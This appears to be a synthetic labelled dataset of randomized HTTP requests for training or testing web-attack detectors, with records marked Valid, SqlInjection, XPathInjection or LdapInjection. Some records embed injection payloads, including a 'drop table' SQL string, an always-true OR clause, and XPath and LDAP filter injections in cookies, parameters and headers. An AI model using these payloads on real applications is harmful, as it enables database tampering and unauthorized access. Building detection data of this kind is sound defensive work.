Content-Length: 88
Content-Language: l,t6O,ehhbe
Content-Encoding: identity
Content-Location: /ieuso2s/axiansQy/6hoitor/2fnq/f6xtpu.bin
Content-MD5: VmZpYW42dGtmQTVsTmV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Aug 06 07:21:08 GMT
Last-Modified: Wed, 03 Jan 07 15:23:52 CET
Host: www.rdaconQ.be
Connection: Euczt9e
Accept: text/html;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.2, identity;q=0.8, compress;q=0.0
Accept-Language: m3s-WLlb;q=0.3
Cache-Control: no-transform
Client-ip: 157.80.150.41
Cookie: atyc0en9sl=223;r-BDeAa=a (u
Cookie2: $Version="9"
Date: Mon, 27 Apr 09 22:47:37 CET
ETag: W/"peUbjB681TZ3ZHuUU"
Expect: trene=ontocto
From: ciTtltrE@srots.ch
If-Modified-Since: Mon, 20 Aug 07 09:54:26 GMT
If-Unmodified-Since: Wed, 10 Mar 10 08:40:34 CET
If-Match: "sjB7NcwugEUzGY6lklK"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: NTLM RW9vQXNqM1RyZHR0c3pva09jcmVscnNyS2FlU2N0cnRqZnJlYWhuZQ==
Range: -805
Referer: /Ihn2/rphc/idcTrI/sth6tr.jpg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.2 (compatible; i8mia; Open BSD i386; eimed8ef)
UA-CPU: StrongARM
UA-Disp: 431,6769,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 7.1 43.92.192.8:36, 7.4 www.s8hvh.css
Transfer-Encoding: compress
Upgrade: yehEh/2.5, feed9e/6.0, Sa702/4.0, nen7e/2.2
Warning: 031 192.107.13.65:1583 "eezimxle" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: --------------
~~~~~: ~~~~~~~~~~~

arwurLrvroae=insee6E&Wv@Ueu7b4Q=214&7U5oaeltrum=ar(&lsinyae=hs&jdrAc=ekx&yitiht0e=iss1

End - Id: 7252
Start - Id: 18792
class: Valid
GET /fmRB/pyno6re/xs/nr9lesNwj/o9b5fjML@HR8.yv/lLYV-.RO/hLz.cn4Zy/GOByj4idkchildnullQV7Ed/Oer/wZmsd9toeenAwe.css?tsea8j=9715553&VOeX=exFrBByn2ser&hlwDrgeoveloIdc=6727216&fhideirsli=1&ooqpetnolasttru=consestac&Reorpl=3202979086&XMQaGQanode=eDOea3qf&cmd7aQ=ini+nepprocessing-instructiont&.KOU=606308&aoonln=73251123&G9servicesservicesBaqyNZbetween=hazbenejo7mst&Amleetrjmaecs2o=09318638&ml85tseeaAtJssu=lHhN5YdfE&shutdownVnecho=006 HTTP/1.0
Host: www.sd7ehnafb.st
Connection: close
Accept: image/*;q=0.6, audio/*;q=0.1, application/zip;q=0.6
Accept-Charset: iso-8859-7;q=0.9, windows-1251;q=0.8, euc-kr;q=0.5
Accept-Encoding: *
Accept-Language: y-8, t-or;q=0.8, wanonbl-4mtntO;q=0.1, hers-cgn
Cache-Control: max-age=29684
Client-ip: 201.90.192.76
Cookie: nbdxp=n;sfDO7epnc=peorel3ieni;irNcetesehEet=8766
Cookie2: $Version="72"
Date: Thu, 21 Feb 08 16:12:34 GMT
ETag: "915NzLGEFb2FG7Ud@t"
Expect: 100-continue
From: ni9cft@w6rom2bfn.de
If-Modified-Since: Tue, 06 Jan 04 13:12:21 GMT
If-Unmodified-Since: Sat, 20 Oct 07 08:40:07 UTC
If-Match: *
If-None-Match: "EsJxFiU0JctPAsx"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.1
Pragma: t='weet6'
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Basic c3d5dXRlYTpkeWlN
Range: 948-33471
Referer: http://hwfk.be/eetoh/cvqy/mls1ojxn/0Seaazl/niWhi.swf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.8 (compatible; Konqueror/9.2; WinNT; 7CZETrdnHg; tzos51m)
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/1.2 www.Ralh.js, 6.0 www.osglwt.tiff, 0.7 251.115.91.228
Transfer-Encoding: gzip
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 003 www.Ooy6hd.tiff "oonlbt8n4cweMttbL" 
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18792
Start - Id: 14939
class: Valid
GET /BselectDXE7aVQ6nBO/20tscnhoeomoeait0szr/n_/esa5e1n/axE/silu.shtml?e4frs=rBH2ik3QEqBE&yredlErn=sltthi2sDydiaeedi&AQtinserttelnet=sVreNFkEdt&2Z2bsO=k%298tNl5&eeehg=iWEWXr&tatRueg=yocxtermita%3C3Sp%5Bu%7Ere%5CkB&81zetc3hkJQIq5=koOa%3Denit%2Flocationd+eB+ReEl&4tstlwa=sr6u&SvNRwLechoz1A=n4cv&cyl@cGtBHnc=a&-Lusrfdf3Va=%27I&ripdtneG=7nhzs&GnELs=872 HTTP/1.0
Host: 91.62.237.187
Connection: keep-alive
Accept: video/*;q=0.0, text/*, text/*;q=0.8
Accept-Charset: windows-1255;q=0.9, koi8;q=0.6, x-mac-chinesesimp, x-mac-greek;q=0.5, x-mac-greek;q=0.3
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: SrAFt2n=ss
Client-ip: 210.67.84.109
Cookie: smdeiner4w1o2fo=rge1mdjVeoo;op9e5e=~fot;@Rq-=iHp3cincxtJisu;tl=5
Cookie2: $Version="3"
Date: Thu, 23 Apr 09 12:38:35 CET
ETag: "8Fd4Kk8x.tZjVSu"
Expect: ntOOcu
From: Ziwa@diwImR.it
If-Modified-Since: Sun, 21 Jan 07 24:01:13 GMT
If-Unmodified-Since: Sat, 05 May 07 04:08:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Feb 04 02:48:07 GMT
Max-Forwards: 30
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: NTLM dHNBbDM4aW5GYmU3b2xvZW1sYW9zbmVuaXJsc2Vmb3Rp
Range: 19024-74,-1374,-1
Referer: /nruUhbn/Urekn/sead.cfm
TE: gzip,chunked
Trailer: From
User-Agent: stuseu (bcvoHAsnh; r5mBJcwL; n9nl5Ukoug; 0ruhH4U; hrIEYQ7m)
UA-CPU: PowerPC
UA-Disp: 482,331,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8266x800
Via: hvc/3.6 www.ne8aszde.js:0, FTP/1.3 www.pneatnv.shtml
Transfer-Encoding: qaeSie
Upgrade: Wakot/1.1, 8tc3d/0.8, aaaaNa/9.3, nem/3.6, t9l/3.8
Warning: 920 www.4stno.html "3fzsoa8stoh11" "Wed, 04 May 05 04:08:13 GMT"
X-Forwarded-For: 90.205.29.175
X-Serial-Number: 51313390873628125654
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14939
Start - Id: 2771
class: Valid
GET /e3/uGbRA/emeswetdo1Rtis/fhbP.MmnRPJoU2Huc/6OMNPgUa/nagoao5uokoe6oiaEd/nsq0satty/3ceJMdrzetKIxwW0/o7fgPRQGtWS5B2P/o6tevtLed/u@tUD/ellnhieepva.png?5D8t-kaccess_logyw9s=tNc&imOhg=nhsreplaceua&gbj=%24t&wBqiMN@xG=opue1etkQ&eeast7doeirdHo=sSyMKyp&wsssoamnw=703985504&peneerbaXbsnb8=iisChcA HTTP/1.0
Host: 147.221.34.6:1
Connection: Cagps
Accept: text/*;q=0.0, application/postscript, video/*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: compress, identity;q=0.1, identity, compress
Accept-Language: ei-Army, rdoun-imzgf;q=0.8, ird-troeEt;q=0.5, EaNitd-s
Cache-Control: no-store
Client-ip: 50.180.170.170
Cookie: B.i4ieH9Slw=6757
Cookie2: $Version="55"
Date: Wed, 26 Jul 06 15:35:51 CET
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: ud20arnu
From: lqlhi@vaenn.fr
If-Modified-Since: Tue, 22 Jul 08 20:17:21 UTC
If-Unmodified-Since: Tue, 21 Oct 08 21:14:44 UTC
If-Match: *
If-None-Match: "JZIuFkYu0gJQtvlVynYs"
If-Range: *
Max-Forwards: 744
MIME-Version: 6.0
Pragma: ao4hVd='S4alus'
Proxy-Authorization: Digest realm
Authorization: iwuNiL r7ns5wf=oSjfnr
Range: 976570-,49585-,-00490
Referer: /7pset/GecEbt/ngnethl.cgi
TE: chunked,chunked;q=0.5
Trailer: Warning
User-Agent: 4nEsmwt (oyYx-mtI; e_Xy3g3-; yCuCNNe)
UA-CPU: Sparc
UA-Disp: 9580,602,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: nsn5/9.7 www.pmumeer.png, pic/2.5 www.r1ti.gif, 2.7 www.3ezirci.htm:2130
Transfer-Encoding: deflate
Upgrade: silEs/6.4
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2771
Start - Id: 41736
class: SqlInjection
GET /dO21ltre/bzov6dC/o7ef_mEE/ouietAvts/gYYaPvnqdkyNTZ6f14O3/r6os3cnaeg/tYfKeL46G4/n6A6m8.nsf?vaehaeSYwat=99676&weqTP=%27%3B++drop++++table++c4nitl9H&oN8W1oontp4ouk=665986315&nYPoexecY=2470027 HTTP/1.0
Host: www.fivcn8ebdu.gov:1481
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-3;q=0.5, windows-1251, shift_jis, cp-950
Accept-Encoding: *
Accept-Language: cq-uleaWlbo, nfaw-9lcea, tieda-ts;q=0.1, gdry-dmu
Cache-Control: no-transform
Client-ip: 136.31.14.94
Cookie: yanthse34dK7wi0=an4igm~2athttcuopt%u];0aEtihdepyf=j;getnAnhoeid1a=tYIf;HkRusrdNmBEF=mrtkHtha1nupan;wiaPeemOtrt=EtLft>;Eat8ilaenis=0426
Cookie2: $Version="0"
Date: Tue, 08 Feb 05 06:35:33 GMT
ETag: ".8@GDRHyIA4apu-uhu"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Mon, 17 Oct 05 04:17:58 UTC
If-Unmodified-Since: Sat, 29 Apr 06 16:45:25 UTC
If-Match: *
If-None-Match: *
If-Range: "l@zlvyPiyamtfnCLEf6"
Max-Forwards: 2
MIME-Version: 6.8
Pragma: luamuo=xo
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic OW9JODg6ZXJncg==
Range: -9158,6593-962,-115779
Referer: /ytyt/tyoebews.css
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: pais1basEg/5.7
UA-CPU: 68000
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: HTTP/2.7 42.193.108.231:35251, 9.3 www.Unmeh.css, 5.0 7.229.59.159
Transfer-Encoding: compress
Upgrade: expelt/1.7, tne6Nt/2.1
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41736
Start - Id: 30600
class: Valid
GET /axB3e6A3c8xo/nw9Ww3WBwmvhI6/cg2r3WetniyRr4/f4ih1mmtoffi/3zGoptl/nnnEzqfavt/eEiZtGH/rf7ennoB/cxCAh/icoef/Xlo49t4nreycetu.css?dmna=%3Cbtr4N%25netcatrth%3Dvar+n%25&IaWle7s=ga&the7T=%2Bt%5D2%7C+aatilm%3Cr&oycmylae=%26oltrindt%3Efd&VjwBSgWGOX9f=thmn6srittda&eeuninr=ty75&loi=ern&oooerui5k=ftacrzbrdi%26+5+c+&qbJv=3nicopydroph+BH&lRMI7do=1000443&YVbwV39Woxtermor8=4o%5D4%29Udocumentdphp6ewcopy7efo&hnnIvu3dCinsf=801&5t=8&seslijsNn6eaABr=5085 HTTP/1.1
Host: www.hth9qwhloo.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.2, windows-1258;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 94.28.253.158
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="613"
Date: Sun, 04 Sep 05 01:46:17 UTC
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: t5tsTx@a6D80vsnt.org
If-Modified-Since: Tue, 24 Jun 08 01:56:07 CET
If-Unmodified-Since: Tue, 11 Sep 07 06:42:09 UTC
If-Match: "3pp4afNTooYP_cTP"
If-None-Match: "EsKzmOLOEE_NZ0pUvG"
If-Range: "ThkbnTvIJ4EtmXJ"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: hRee oDmh2cnf=pgl8cs
Range: -07588
Referer: http://www.utibek.cz/Edqm.mpeg
TE: deflate;q=0.6,trailers
Trailer: Expect
User-Agent: oceenumy/5.7
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: 9.1 www.lcs9s.jpeg
Transfer-Encoding: deflate
Upgrade: sdiomm/2.1, Wsg/0.8, imNsy/1.7, jse/5.1, nhs/6.4
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 113.222.226.64
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30600
Start - Id: 35510
class: XPathInjection
GET /seinoxer/eteiOarhRaben/2Kx-WOjEK/imCe/tkIkrBFQI/lAnirIk/AU1Dwa@lkWFrm2/wna/wZg/nrU3E2PTYdXw5WWdb.bin?ReAyble=zTfq&4a7lijlEIs=hsrlShxeud&lrb2iSUn=t+OASesmjef&ham=51114860&siierhoanrWi=a+teaui7Dwac2optt&na=Nt&lsosIr1oteeEe5g=ope+whereLhsolrderpt+aS&0J__jWXJcKFbgsound=3+W9&fI0EEd26o1koytf=ecbTclABcHY HTTP/1.0
Host: 247.28.49.178
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 154.234.253.239
Cookie: m0nhlletwsh=dl'  or    esese/y/child::node()[processing-instruction()=912]  or     'oosg9aen'    =   ';AlvimgNxC3guE=02773;trylu=im 4ro%5fthrd;0yfXqwZC=6oicO s[at3orua
Cookie2: $Version="51"
Date: Sun, 27 Apr 08 15:32:07 UTC
ETag: "gVgs18cGVvAZ5WVLIv"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 02:55:48 CET
If-Unmodified-Since: Tue, 27 Jan 04 16:49:46 UTC
If-Match: *
If-None-Match: "P9NrV43j.Y39TFP_J1"
If-Range: Sat, 09 Feb 08 24:44:43 CET
Max-Forwards: 8
MIME-Version: 5.4
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Range: 701300-17610,787563-,170555-675966
Referer: http://www.st3o.st/3mxt5neH/tyiurynr/eiVhwe/nwAit.txt
TE: deflate;q=0.4
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 5.5; 0u-xa; rv:6.4.8) Gecko/51944341
UA-CPU: MIPS
UA-OS: Windows 98
Via: 9.3 www.ccspoha.tiff
Transfer-Encoding: hieRrr
Upgrade: suTl2/6.0, eeUi/2.9, omihh/3.0, Yagk/1.2, aNoas/6.4
X-Forwarded-For: 215.42.188.148
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35510
Start - Id: 19168
class: Valid
GET /baxterm/aro2ntrssmaxzetMje/@NM6q/ebpevdie/opha.pl? HTTP/1.1
Host: 203.124.92.68
Connection: 40Eyub
Accept: video/quicktime
Accept-Charset: utf-8;q=0.3, iso-8859-5;q=0.4, iso-2022-jp, iso-8859-5;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 164.158.68.106
Cookie: Sd6ah6aparh9oO=87387285
Cookie2: $Version="331"
Date: Tue, 23 Mar 10 09:19:22 UTC
ETag: "JKdo902.JrP1q_5Ym8X3"
Expect: 100-continue
From: sls8@HHNtidid7.ch
If-Modified-Since: Sun, 11 Jul 04 01:56:18 UTC
If-Unmodified-Since: Fri, 07 Jan 05 17:45:17 GMT
If-Match: "U.4MZjPVi1iW.LQ"
If-None-Match: "ngzRGU4Lwncvs3ikx"
If-Range: "X-jW1c902R6@jEtrHA"
Max-Forwards: 5405
MIME-Version: 6.6
Pragma: rw=cLepvh
Proxy-Authorization: NTLM dHRlbTNkZVNldGNpdGlsa25vZUVvaW9ld1MxbnQ4N2kyZWl0b3ND
Authorization: Digest cnonce="oety"
Range: -26751,992963-79665,-06526
Referer: http://www.7hlus.de/gylero/ehiohr4/Ahezcmmr/fjmste.mp3
TE: chunked;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 6.9; ct-he; rv:2.2.3) Gecko/59396582
UA-CPU: MIPS
UA-Disp: 070,359,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: HTTP/8.8 www.heee.shtml, FTP/9.9 www.slns.tiff
Transfer-Encoding: solnew; Zsnt=ltZetcst
Upgrade: rtecO/7.7, YhdLe/3.7, hose/2.0, 6szce/9.1, ide47/9.2
Warning: 693 239.139.121.216 "lqenTohNatwk" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19168
Start - Id: 42769
class: SqlInjection
PUT /hgeooct1r7alNr/q6iestrhenasgoIHrt/anlnbstsoymytja2/aSvsredxcine/aenetrre/iq4lDkvst.F7-P/ucNh88/twyallSTE/cxelem.shtml? HTTP/1.0
Content-Length: 142
Content-Language: 3asee,Psa,egbho
Content-Encoding: gzip
Content-Location: /ia31t2wl/gmegt.cgi
Content-MD5: aDFjdWVmdGJwZXN0aWV0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Oct 05 13:16:00 CET
Last-Modified: Tue, 19 Jul 05 20:39:45 CET
Host: www.rt85bt.de:80
Connection: close
Accept: audio/x-wav;q=0.8
Accept-Charset: x-mac-ce, windows-1250, x-mac-chinesetrad;q=0.2, x-mac-icelandic, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=397
Client-ip: 88.137.246.81
Cookie: uoUthcn8jaateot='  OR     ''= '
Cookie2: $Version="32"
Date: Tue, 06 Sep 05 11:03:27 CET
ETag: "YaxLpnk6itmK_Yb"
Expect: 100-continue
From: anpaN@pbason.biz
If-Modified-Since: Sun, 23 Apr 06 14:03:49 UTC
If-Unmodified-Since: Thu, 07 Jan 10 04:11:22 CET
If-Match: "mES35K3NuDEJduD2DY"
If-None-Match: *
If-Range: Tue, 11 Jan 05 03:43:22 GMT
Max-Forwards: 40
Pragma: pofi=ael
Proxy-Authorization: Digest nc=eEBc91aE
Authorization: NTLM M2Flb2ZlcHJoZXRnU2d5a29lZXQydW9taHRlbG5uYmU=
Range: -6,803-,601849-26
Referer: /U59r/wftdgc/0ud3.cfm
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.8 (X11; U; Unix 0.1; sd-Io; rv:8.6.3) Gecko/19872644
UA-Disp: 110,8354,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 648x107
Via: 8.1 175.201.127.15:61, 1.4 202.140.126.176
Transfer-Encoding: gzip
Upgrade: Hic/2.5, elet/9.7
Warning: 418 141.165.184.104 "0mnaebmiteR" "Sat, 15 Oct 05 03:22:41 UTC"
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

6nezptobn=a&DOboot.iniZ9_=dRt+q cetrp&EGAoo=;&JetzTderraAnt=27&dahhgemsdrest=tuR62t&itl4ma=3068662831&edd6u=146271&taa=5e&smailhoieig6le

End - Id: 42769
Start - Id: 38602
class: LdapInjection
GET /mxlarqvk5.php3?bin1e32C=13%29%28%26%28objectClass%3DmSs%29%28%7C%28sn++++%3D++++dahq%29%28cn%3Dtt+++J*%29%29&tee4othdl6tee=99&lyno4zae9yhRnq=%7Cai%7CynwnDat&KshutdownSNC3u5T=gly%29i HTTP/1.0
Host: www.Fdib.gov:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic, x-mac-chinesetrad, iso-8859-5;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 47.85.156.197
Cookie: isfb=541078
Cookie2: $Version="7"
Date: Tue, 01 May 07 17:45:17 UTC
ETag: W/"1BC0q5Z63GcBA0j"
Expect: trilhrm
From: Henr0sl4@nexht.fr
If-Modified-Since: Mon, 27 Aug 07 04:48:00 CET
If-Unmodified-Since: Wed, 28 Nov 07 13:55:48 GMT
If-Match: "bV571v-3Ly.hYO5fI5eK"
If-None-Match: "cd7nqOi2gZneUnJI-Vf"
If-Range: Sat, 25 Jun 05 18:21:41 CET
Max-Forwards: 16
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic dHQwaXJhZTpEcmVh
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: http://www.hi1m.ch/Trdu.mp3
TE: trailers,chunked;q=0.3
Trailer: Max-Forwards
User-Agent: nt4DLar6sqsf
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5664x146
Via: 2.7 131.55.247.223, 6nykL/0.4 www.g4dEeth.tiff, o7hen/8.6 65.41.39.205
Transfer-Encoding: compress
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38602
Start - Id: 2108
class: Valid
GET /cZRA/eTOGmAJ/alehtlettci8hrsetsrn/yqgGI.dll?tm0nLttU=s5t%29I%29fsock_streamecy&enne3tef3gq=obinnbaiHhonii3n&DJts3oghlyinul=ep6pSiMrfo HTTP/1.1
Host: www.ueyhhgcye.it
Connection: keep-alive
Accept: application/rtf, audio/basic;q=0.5, audio/x-wav
Accept-Charset: windows-1252
Accept-Encoding: *;q=0.2
Accept-Language: atosdmf-my;q=0.8
Cache-Control: only-if-cached
Client-ip: 152.109.97.244
Cookie: uin=2&ag5;tcwbtpwsvhe=femRiaooohlafine
Cookie2: $Version="7"
Date: Sun, 16 Dec 07 02:33:28 UTC
ETag: W/"q8cmxRdF9pNsuulE7TC"
Expect: 100-continue
From: nl0fyslt@tlSn3roowo.be
If-Modified-Since: Tue, 22 Jul 08 23:43:11 UTC
If-Unmodified-Since: Sun, 01 Jun 08 05:59:56 CET
If-Match: "oZPPgyE-8_c9GVr"
If-None-Match: "T-2vjQ8k4hdvsi@"
If-Range: "y_VCozJ@alLRoZXDXOCE"
Max-Forwards: 4
MIME-Version: 2.0
Pragma: fu3vgF='3N'
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="5E07471bb944aF57CD47C235c6389bdB"
Range: 621-,04-,-085540
Referer: /djti/t0h4pib/C4obccd.mdb
TE: trailers
Trailer: Upgrade
User-Agent: fcceosb
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: 7.3 239.109.228.106
Transfer-Encoding: gzip
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 551 www.azMe.gif "eLopsrhhmd3yte9t3h" 
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2108
Start - Id: 14397
class: Valid
GET /awSz/cNy.OPzuTvnDBb19xeGV/eitgl/tL4d2VdCCk0Q9/egmeSmIqSn.php?fadcoCgnSjtn=mofi&7dxs5psAist0esE=a1sotona%7C HTTP/1.0
Host: 26.132.245.39:7
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: isets-iebtIaua;q=0.2, sebe-me, 1nmtl-e;q=0.1, siculd-nc;q=0.9
Cache-Control: min-fresh=32697
Client-ip: 242.114.172.151
Cookie: tol=tBUJZc;hjmqUee5=Lwitttx|utor;myeeanox1h9=Oar2dnd>a'?;cp6viqjgU=opXKDP0-;24naUiUeBKv0=aMGz7e
Cookie2: $Version="88"
Date: Mon, 29 Mar 10 16:32:39 GMT
ETag: W/".hk0JKuS95FK1JbPTAD"
Expect: 2o7t9Lld=xaae;oliro
From: Rt7eei@haruek9a0.st
If-Modified-Since: Fri, 09 Apr 10 20:36:31 CET
If-Unmodified-Since: Tue, 10 Oct 06 14:10:58 CET
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: Thu, 08 Jan 09 09:51:11 GMT
Max-Forwards: 434
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: ea2o mixe=e9dtn5
Range: -71089,-74863
Referer: /9utnrair/scRwh.swf
TE: trailers,deflate,chunked;q=0.6
Trailer: Authorization
User-Agent: Mozilla/2.6 (X11; U; Linux i586 4.0; iv-6r; rv:4.9.9) Gecko/62711403
UA-CPU: StrongARM
UA-Disp: 437,7819,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 8.8 www.tiitrnpm.png, mwd4ma/4.7 163.67.43.207
Transfer-Encoding: deflate
Upgrade: swzoit/1.5, jflt/3.5
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14397
Start - Id: 37272
class: LdapInjection
PUT /n6fyimleh02/5PECTmfWWa5/inby/te9laxaeen/eneienebl67Y/pZ/hneh/wIs1x.nsf? HTTP/1.0
Content-Length: 212
Content-Language: 0am2ee7,8ftre2fo
Content-Encoding: identity
Content-Location: /tjao/TIna7h/paminedy.php4
Content-MD5: SHVpaGRidWFubzdvaFFldw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 09:27:21 CET
Last-Modified: Sat, 24 Sep 05 17:12:46 CET
Host: www.5IirnnoaE.biz
Connection: mthAt
Accept: */*
Accept-Charset: iso-8859-8;q=0.4, x-mac-ce;q=0.4, windows-874
Accept-Encoding: *;q=0.9
Accept-Language: 4o-tos, nkgn87ps-zat
Cache-Control: lsnslbie=n
Cookie: a3=152915;rz=wihYeedbk2vow;txwonocsislIuey=dlrTsAm6eeenk;etiavSvSerl=pfvI5lTuoed;oete1pOtmda=/s0nedeeyidcosock_streamjyiRo(;5uechohMoPx=fOCF3RM5GT6
Date: Fri, 24 Apr 09 24:48:05 GMT
If-Modified-Since: Mon, 28 Mar 05 16:00:43 CET
If-Unmodified-Since: Sat, 22 Aug 09 01:52:21 UTC
If-None-Match: "OnyNhCmbXL71t7vAZxqX"
If-Range: Sat, 30 Oct 04 01:01:14 UTC
Max-Forwards: 9797
MIME-Version: 5.1
Pragma: Amribh10='htsiyeo'
Authorization: NTLM OHNzYW83ZWVMeGlkbzNpbzdlanR0T2x5ZWVMbmxoZXI=
Range: -3,40874-059856,-5
Referer: /cljy08w/ssee9/dyNtjc.asmx
Trailer: Via
User-Agent: ) ( |  (    cn=*o'brien*   )(mail    =*o    'brien*)    
UA-Color: color32
Via: 3ae/8.9 141.52.105.178, FTP/2.4 www.1Tnrg.css:7, 0.3 www.swxai.tiff
~~~~~: ~~~~~~~~~~~~~~~~~~

rdy= tt&tetes7yep41art=70&ffieekheosu=fT2hc34FH&ramodls=vr &Okiuacadnk=tlresH5adge~nn&zht5eeeroleerja=6155&apW=htons8sh&aNsust=xzsPncuO&O8saosetd=nwe&6attjrDern=99986965&oagnoV=qJpTUkKF&uhtlaahl=a&retac=1322094

End - Id: 37272
Start - Id: 26585
class: Valid
GET /b0Z4s8DtAu6e37q/c1esexedttYsdkr/soe/tymtSpa@Q6/R556_x16betweenV/sWDGd6NFhcp/cDdj6eH9euI/iocLksjXM1nJKP/f3otzspfytheao.asp? HTTP/1.0
Host: 67.138.169.103
Connection: TxHMecTl
Accept: application/*, application/rtf, video/quicktime;q=0.7
Accept-Charset: iso-8859-3;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: xeem-zeoder, 6-dho;q=0.9, aseii-ys9;q=0.6, SesY-oee;q=0.0
Cache-Control: min-fresh=2
Client-ip: 183.22.7.137
Cookie: tQsqh=25145911;toFrwlOa=sR/e n;Kslibtl3K;hw=fkAaeuyn4aaa;ye9r=nomttlttybdiolr
Cookie2: $Version="7"
